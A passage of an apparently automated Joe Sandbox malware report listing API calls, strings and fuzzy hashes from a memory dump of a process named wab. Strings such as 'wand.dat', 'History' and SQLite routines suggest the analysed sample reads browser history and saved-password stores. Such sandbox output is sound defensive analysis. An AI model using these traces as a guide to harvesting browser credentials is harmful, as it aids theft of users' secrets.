                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??3@
                                                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                                                          • API String ID: 3314356048-2133833424
                                                                                                                                                                                                                          • Opcode ID: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1889144086-0
                                                                                                                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1661045500-0
                                                                                                                                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
